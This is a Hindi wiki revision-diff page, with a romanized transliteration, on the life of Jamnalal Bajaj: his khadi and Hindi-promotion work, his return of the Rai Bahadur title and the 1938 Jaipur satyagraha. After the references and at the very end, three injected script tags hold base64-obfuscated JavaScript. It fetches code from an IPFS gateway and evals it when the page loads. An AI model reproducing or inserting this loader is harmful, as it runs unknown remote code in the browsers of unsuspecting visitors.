Difference between revisions of "जमनालाल बजाज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
जमनालाल बजाज ने खादी और स्वदेशी अपनाया और अपने वेशकीमती वस्त्रों की होली जलार्इ। जमनालाल जी ने अपने बच्चों को किसी फैशनेबल पब्लिक स्कूल में नहीं भेजा, बल्कि उन्हें स्वेच्छापूर्वक वर्धा में आरम्भ किये गये [[विनोबा भावे|विनोबा]] के सत्याग्रह आश्रम में भेजा। सन [[1922]] में अपनी पत्नी को लिखे एक पत्र में उन्होंने कहा कि- "मैं हमेशा से यही सोचता आया हूं कि तुम और हमारे बच्चे मेरे ही कारण किसी प्रकार की प्रतिष्ठा अथवा पद प्राप्त न करें। यदि कोर्इ प्रतिष्ठा अथवा पद प्राप्त हो, तो वह अपनी-अपनी योग्यता के बल पर हो। यह मेरे, तुम्हारे, उनके सबके हित में है।"<ref>{{cite web |url=http://gandhiinaction.ning.com/profiles/blogs/5013308:BlogPost:29732 |title=जमनालाल बजाज, महात्मा गाँधी तथा अन्य |accessmonthday=14 जुलाई|accessyear= 2018|last= |first= |authorlink= |format= |publisher=gandhiinaction.ning |language= हिन्दी}}</ref>
 
जमनालाल बजाज ने खादी और स्वदेशी अपनाया और अपने वेशकीमती वस्त्रों की होली जलार्इ। जमनालाल जी ने अपने बच्चों को किसी फैशनेबल पब्लिक स्कूल में नहीं भेजा, बल्कि उन्हें स्वेच्छापूर्वक वर्धा में आरम्भ किये गये [[विनोबा भावे|विनोबा]] के सत्याग्रह आश्रम में भेजा। सन [[1922]] में अपनी पत्नी को लिखे एक पत्र में उन्होंने कहा कि- "मैं हमेशा से यही सोचता आया हूं कि तुम और हमारे बच्चे मेरे ही कारण किसी प्रकार की प्रतिष्ठा अथवा पद प्राप्त न करें। यदि कोर्इ प्रतिष्ठा अथवा पद प्राप्त हो, तो वह अपनी-अपनी योग्यता के बल पर हो। यह मेरे, तुम्हारे, उनके सबके हित में है।"<ref>{{cite web |url=http://gandhiinaction.ning.com/profiles/blogs/5013308:BlogPost:29732 |title=जमनालाल बजाज, महात्मा गाँधी तथा अन्य |accessmonthday=14 जुलाई|accessyear= 2018|last= |first= |authorlink= |format= |publisher=gandhiinaction.ning |language= हिन्दी}}</ref>
 
==महत्त्वपूर्ण कार्य==
 
==महत्त्वपूर्ण कार्य==
अखिल भारतीय कोषाध्यक्ष की हैसियत से खादी के उत्पादन और उसकी बिक्री बढ़ाने के विचार से जमनालाल बजाज ने देश के दूर-दराज भागों का दौरा किया, ताकि अर्धबेरोजगारों को फायदा पहुंच सके। [[1935]] में [[गांधीजी]] ने 'अखिल भारतीय ग्रामोद्योग संघ' की स्थापना की। इस नये संघ के लिए जमनालाल बजाज ने बडी खुशी से अपना विशाल बगीचा सौंप दिया, जिसका नाम गांधीजी ने स्वर्गीय मगनलाल गांधी के नाम पर 'मगनाडी' रखा। [[1936]] में 'अखिल भारतीय हिंदी साहित्य सम्मेलन', [[नागपुर]] के बाद तुरंत ही जमनालाल जी ने वर्धा में देश के पश्चिम और पूर्व के प्रांतों में [[हिंदी]] प्रचार के लिए, 'राष्ट्रभाषा प्रचार समिति' की स्थापना की तथा उसके लिए राशि इकट्ठा की। इसके कुछ ही समय बाद वह 'हिन्दी साहित्य सम्मेलन', [[मद्रास]] के अध्यक्ष चुने गये। अपने इस पद का उपयोग उन्होंने राष्ट्रभाषा आंदोलन को व्यवस्थित रूप देने की दिशा में किया। जमनालाल जी इसके अतिरिक्‍त मन, प्राण से [[हिन्दू]]-[[मुस्लिम]] एकता और अछूतोद्धार के काम में जुट गये। वास्तव में वे देश के प्रथम नेता थे, जिन्होंने वर्धा में अपने पूर्वजों के 'लक्ष्मीनारायण मंदिर' के द्वार [[1928]] में ही अछूतों के लिए खोल दिये थे। जमनालाल बजाज और उनकी पत्नी जानकी देवी अतिथियों की पसंद का बहुत खयाल रखते थे। त्याग की दृष्टि से उनका अंतिम कार्य सर्वश्रेष्ठ रहा। देश के पशुधन की रक्षा का काम उन्होंने अपने लिए चुना था और [[गाय]] को उसका प्रतीक माना था। इस काम में वे इतनी एकाग्रता और लगन के साथ जुट गये थे कि जिसकी कोर्इ मिसाल नहीं थी। उनका सबसे बड़ा काम गो-सेवा का था। वैसे तो यह काम पहले भी चलता था, लेकिन धीमी चाल से। इससे उन्हें संतोष न था। उन्होंने इसे तीव्र गति से चलाना चाहा और इतनी तीव्रता से चलाया कि खुद ही चल बसे। अगर हमें गाय को जिंदा रखना है तो हमें भी उसकी सेवा में अपने प्राण खोने होंगे।
+
अखिल भारतीय कोषाध्यक्ष की हैसियत से खादी के उत्पादन और उसकी बिक्री बढ़ाने के विचार से जमनालाल बजाज ने देश के दूर-दराज भागों का दौरा किया, ताकि अर्धबेरोजगारों को फायदा पहुंच सके। [[1935]] में [[गांधीजी]] ने 'अखिल भारतीय ग्रामोद्योग संघ' की स्थापना की। इस नये संघ के लिए जमनालाल बजाज ने बडी खुशी से अपना विशाल बगीचा सौंप दिया, जिसका नाम गांधीजी ने स्वर्गीय मगनलाल गांधी के नाम पर 'मगनाडी' रखा। [[1936]] में 'अखिल भारतीय हिंदी साहित्य सम्मेलन', [[नागपुर]] के बाद तुरंत ही जमनालाल जी ने वर्धा में देश के पश्चिम और पूर्व के प्रांतों में [[हिंदी]] प्रचार के लिए, 'राष्ट्रभाषा प्रचार समिति' की स्थापना की तथा उसके लिए राशि इकट्ठा की। इसके कुछ ही समय बाद वह 'हिन्दी साहित्य सम्मेलन', [[मद्रास]] के अध्यक्ष चुने गये। अपने इस पद का उपयोग उन्होंने राष्ट्रभाषा आंदोलन को व्यवस्थित रूप देने की दिशा में किया। जमनालाल जी इसके अतिरिक्‍त मन, प्राण से [[हिन्दू]]-[[मुस्लिम]] एकता और अछूतोद्धार के काम में जुट गये। वास्तव में वे देश के प्रथम नेता थे, जिन्होंने वर्धा में अपने पूर्वजों के 'लक्ष्मीनारायण मंदिर' के द्वार [[1928]] में ही अछूतों के लिए खोल दिये थे। जमनालाल बजाज और उनकी पत्नी जानकी देवी अतिथियों की पसंद का बहुत खयाल रखते थे।
  
 +
त्याग की दृष्टि से जमनालाल बजाज का अंतिम कार्य सर्वश्रेष्ठ रहा। देश के पशुधन की रक्षा का काम उन्होंने अपने लिए चुना था और [[गाय]] को उसका प्रतीक माना था। इस काम में वे इतनी एकाग्रता और लगन के साथ जुट गये थे कि जिसकी कोर्इ मिसाल नहीं थी। उनका सबसे बड़ा काम गो-सेवा का था। वैसे तो यह काम पहले भी चलता था, लेकिन धीमी चाल से। इससे उन्हें संतोष न था। उन्होंने इसे तीव्र गति से चलाना चाहा और इतनी तीव्रता से चलाया कि खुद ही चल बसे। अगर हमें गाय को जिंदा रखना है तो हमें भी उसकी सेवा में अपने प्राण खोने होंगे। जमनालाल जी कार्यकर्ताओं को केवल आर्थिक सहायता ही नहीं देते थे, वह उनके बच्चों की शिक्षा का भी प्रबंध करते थे। बीमार पड जाने पर उनकी चिकित्सा भी करवाते थे। वह ऐसे लोगों के बच्चों की सूची भी रखते थे और उनकी शादी बहुत कम खर्च में करवा देते थे। इसी कारण [[गांधीजी]] उन्हें स्नेह से "शादी काका" भी कहते थे।
 +
=='राय बहादुर' की पदवी==
 +
सन् [[1918]] में सरकार ने जमनालाल बजाज को 'राय बहादुर' की पदवी से अलंकृत किया। इसके लिए जब जमनालाल बजाज ने गांधीजी से सलाह मांगी तो उन्होंने कहा- "नये सम्मान का सदुपयोग करो। सम्मान और पदवी इत्यादि खतरनाक चीजे हैं। उनका सदुपयोग की जगह दुरुपयोग अधिक हुआ है। मैं चाहूंगा कि तुम उसका सदुपयोग करो। यह तुम्हारी देशभक्ति या आध्यात्मिक उन्नति के आडे नहीं आयेगा।" [[1920]] में कलकत्ता अधिवेशन में असहयोग का प्रस्ताव पारित हुआ, तो जमनालाल जी ने अपनी पदवी लौटा दी।
 +
==जयपुर सत्याग्रह==
 +
[[1931]] में जमनालाल जी के प्रयत्नों के कारण 'जयपुर राज्य प्रजा मंडल' की स्थापना हुर्इ। [[1936]] में यह मंडल सक्रिय रूप से काम करने लगा। [[30 मार्च]], [[1938]] को [[जयपुर]] राज्य ने अचानक एक आदेश निकाल दिया कि सरकार की आज्ञा के बिना जयपुर राज्य में किसी भी सार्वजनिक संस्था की स्थापना नहीं की जा सकेगी। इस आदेश का मुख्य निशाना प्रजा मंडल की गतिविधियों को व्यर्थ करना था। मंडल का वार्षिक अधिवेशन [[8 मई]] व [[9 मर्इ]] को जमनालाल जी की अध्यक्षता में घोषित किया जा चुका था। उन दिनों जयपुर के एक [[अंग्रेज़]] [[दीवान]] बीकैम्प सेंटजान को जमनालाल की लोकप्रियता पसंद नहीं थी। [[4 जुलार्इ]], 1938 को बात बहुत बढ़ गयी और जयपुर पुलिस ने एक रेलगाड़ी पर गोलियां चला दी। जिसमें अनेक [[राजपूत]] मरे और घायल हुए। [[सीकर]] के राजपूत और [[जाट]] भड़क उठे और लगा कि खून की नदियां बहने लगेंगी। जब जमनालाल बजाज ने इस शर्मनाक परिस्थिति का समाचार सुना तो उन्होंने चाहा कि दोनों में सुलह हो जाये। सीकर जमनालाल जी का जन्म स्थान था। उन्होंने हिंसा के बजाय लोगों को अहिंसक बने रहने की सलाह दी। [[30 दिसम्बर]], 1938 को जयपुर राज्य में फैले हुए [[अकाल]] का लेखा-जोखा करने तथा राहत कार्य करने के लिए जमनालालजी सवार्इ माधोपुर स्टेशन पर दूसरी गाड़ी का इंतजार कर रहे थे। इतने में इंस्पेक्‍टर जनरल ऑफ पुलिस एफ. एस. यंग ने उनको एक आदेश दिया, जिसमें यह लिखा हुआ था कि रियासत में उनके प्रवेश और गतिविधियों के कारण शांति भंग होने का खतरा है। इसलिए वे रियासत की सीमा में प्रवेश नहीं कर सकते। किन्तु इस निेषेधाज्ञा ने प्रजा मंडल की आंखें खोल दीं। इसके कारण जमनालाल जी के नेतृत्व में [[सत्याग्रह]] किया गया। अंत में जयपुर रियासत को अपनी गलती स्वीकार करनी पड़ी। इसमें कोर्इ संदेह नहीं कि जमनालाल बजाज रियासतों में रहने वाली प्रजा के अधिकारों के सच्चे संरक्षक थे और वह अपने जीवन के अंत तक देशी राज्यों में नागरिक स्वतंत्रता के लिए अनथक संघर्ष करते रहे।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 09:45, 14 July 2018

jamanalal bajaj (aangrezi: Jamnalal Bajaj, janm- 4 navambar, 1889, rajasthan; mrityu- 11 faravari, 1942, vardha) svatantrata sangram senani, udyogapati aur manavashastri the. ve mahatma gaandhi ke bahut karibi aur unake sachche anuyayi the. gaandhiji unhean apane putr saman manate the. jamanalal bajaj 1920 mean kaangres ke koshadhyaksh bane the tatha is pad par ve jivan bhar rahe. unhoanne vardha mean ‘satyagrah ashram’ ki sthapana ki thi. isake alava gau seva sangh, gaandhi seva sangh, sasta sahity mandal adi sansthaaan ki sthapana bhi unake dvara ki gee. jamanalal bajaj jati bhed ke virodhi the tatha unhoanne harijan utthan ke lie bhi prayatn kiya. unaki smriti mean samajik kshetroan mean sarahaniy kary karane ke liye 'jamanalal bajaj puraskar' ki sthapana ki gayi hai.

parichay

jayapur, rajasthan ke ek chhote se gaanv kashi ka vas mean garib kaniram kisan ke yahaan jamanalal bajaj ka janm 4 navambar, 1889 ko hua tha. ve vardha ke ek b de seth bachchharaj ke yahaan paanch varsh ki ayu mean god liye gaye the. seth vachchharaj sikar ke rahane vale the. unake poorvaj sava sau sal pahale nagapur mean akar bas gaye the. vilasita aur aishvary ka vatavaran is balak ko dooshit nahian kar paya, kh‍yoanki unaka jhukav to bachapan se adhyatm ki or tha. jamanalal ki sagarhi das varsh ki avastha mean ho gayi thi. tin varsh bad jab jamanalal 13 varsh ke hue tatha janaki 9 varsh ki hurhian, to unaka vivah dhoomadham se vardha mean hua.

jamanalal bajaj ne khadi aur svadeshi apanaya aur apane veshakimati vastroan ki holi jalarhi. jamanalal ji ne apane bachchoan ko kisi phaishanebal pablik skool mean nahian bheja, balki unhean svechchhapoorvak vardha mean arambh kiye gaye vinoba ke satyagrah ashram mean bheja. san 1922 mean apani patni ko likhe ek patr mean unhoanne kaha ki- "maian hamesha se yahi sochata aya hooan ki tum aur hamare bachche mere hi karan kisi prakar ki pratishtha athava pad prapt n karean. yadi korhi pratishtha athava pad prapt ho, to vah apani-apani yogyata ke bal par ho. yah mere, tumhare, unake sabake hit mean hai."[1]

mahattvapoorn kary

akhil bharatiy koshadhyaksh ki haisiyat se khadi ke utpadan aur usaki bikri badhane ke vichar se jamanalal bajaj ne desh ke door-daraj bhagoan ka daura kiya, taki ardhaberojagaroan ko phayada pahuanch sake. 1935 mean gaandhiji ne 'akhil bharatiy gramodyog sangh' ki sthapana ki. is naye sangh ke lie jamanalal bajaj ne badi khushi se apana vishal bagicha sauanp diya, jisaka nam gaandhiji ne svargiy maganalal gaandhi ke nam par 'maganadi' rakha. 1936 mean 'akhil bharatiy hiandi sahity sammelan', nagapur ke bad turant hi jamanalal ji ne vardha mean desh ke pashchim aur poorv ke praantoan mean hiandi prachar ke lie, 'rashtrabhasha prachar samiti' ki sthapana ki tatha usake lie rashi ikattha ki. isake kuchh hi samay bad vah 'hindi sahity sammelan', madras ke adhyaksh chune gaye. apane is pad ka upayog unhoanne rashtrabhasha aandolan ko vyavasthit roop dene ki disha mean kiya. jamanalal ji isake atirikh‍t man, pran se hindoo-muslim ekata aur achhootoddhar ke kam mean jut gaye. vastav mean ve desh ke pratham neta the, jinhoanne vardha mean apane poorvajoan ke 'lakshminarayan mandir' ke dvar 1928 mean hi achhootoan ke lie khol diye the. jamanalal bajaj aur unaki patni janaki devi atithiyoan ki pasand ka bahut khayal rakhate the.

tyag ki drishti se jamanalal bajaj ka aantim kary sarvashreshth raha. desh ke pashudhan ki raksha ka kam unhoanne apane lie chuna tha aur gay ko usaka pratik mana tha. is kam mean ve itani ekagrata aur lagan ke sath jut gaye the ki jisaki korhi misal nahian thi. unaka sabase b da kam go-seva ka tha. vaise to yah kam pahale bhi chalata tha, lekin dhimi chal se. isase unhean santosh n tha. unhoanne ise tivr gati se chalana chaha aur itani tivrata se chalaya ki khud hi chal base. agar hamean gay ko jianda rakhana hai to hamean bhi usaki seva mean apane pran khone hoange. jamanalal ji karyakartaoan ko keval arthik sahayata hi nahian dete the, vah unake bachchoan ki shiksha ka bhi prabandh karate the. bimar pad jane par unaki chikitsa bhi karavate the. vah aise logoan ke bachchoan ki soochi bhi rakhate the aur unaki shadi bahut kam kharch mean karava dete the. isi karan gaandhiji unhean sneh se "shadi kaka" bhi kahate the.

'ray bahadur' ki padavi

sanh 1918 mean sarakar ne jamanalal bajaj ko 'ray bahadur' ki padavi se alankrit kiya. isake lie jab jamanalal bajaj ne gaandhiji se salah maangi to unhoanne kaha- "naye samman ka sadupayog karo. samman aur padavi ityadi khataranak chije haian. unaka sadupayog ki jagah durupayog adhik hua hai. maian chahooanga ki tum usaka sadupayog karo. yah tumhari deshabhakti ya adhyatmik unnati ke ade nahian ayega." 1920 mean kalakatta adhiveshan mean asahayog ka prastav parit hua, to jamanalal ji ne apani padavi lauta di.

jayapur satyagrah

1931 mean jamanalal ji ke prayatnoan ke karan 'jayapur rajy praja mandal' ki sthapana hurhi. 1936 mean yah mandal sakriy roop se kam karane laga. 30 march, 1938 ko jayapur rajy ne achanak ek adesh nikal diya ki sarakar ki ajna ke bina jayapur rajy mean kisi bhi sarvajanik sanstha ki sthapana nahian ki ja sakegi. is adesh ka mukhy nishana praja mandal ki gatividhiyoan ko vyarth karana tha. mandal ka varshik adhiveshan 8 mee v 9 marhi ko jamanalal ji ki adhyakshata mean ghoshit kiya ja chuka tha. un dinoan jayapur ke ek aangrez divan bikaimp seantajan ko jamanalal ki lokapriyata pasand nahian thi. 4 jularhi, 1938 ko bat bahut badh gayi aur jayapur pulis ne ek relaga di par goliyaan chala di. jisamean anek rajapoot mare aur ghayal hue. sikar ke rajapoot aur jat bh dak uthe aur laga ki khoon ki nadiyaan bahane lageangi. jab jamanalal bajaj ne is sharmanak paristhiti ka samachar suna to unhoanne chaha ki donoan mean sulah ho jaye. sikar jamanalal ji ka janm sthan tha. unhoanne hiansa ke bajay logoan ko ahiansak bane rahane ki salah di. 30 disambar, 1938 ko jayapur rajy mean phaile hue akal ka lekha-jokha karane tatha rahat kary karane ke lie jamanalalaji savarhi madhopur steshan par doosari ga di ka iantajar kar rahe the. itane mean ianspekh‍tar janaral aauph pulis eph. es. yang ne unako ek adesh diya, jisamean yah likha hua tha ki riyasat mean unake pravesh aur gatividhiyoan ke karan shaanti bhang hone ka khatara hai. isalie ve riyasat ki sima mean pravesh nahian kar sakate. kintu is nieshedhajna ne praja mandal ki aankhean khol dian. isake karan jamanalal ji ke netritv mean satyagrah kiya gaya. aant mean jayapur riyasat ko apani galati svikar karani p di. isamean korhi sandeh nahian ki jamanalal bajaj riyasatoan mean rahane vali praja ke adhikaroan ke sachche sanrakshak the aur vah apane jivan ke aant tak deshi rajyoan mean nagarik svatantrata ke lie anathak sangharsh karate rahe.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 154.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  1. jamanalal bajaj, mahatma gaandhi tatha any (hindi) gandhiinaction.ning. abhigaman tithi: 14 julaee, 2018.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>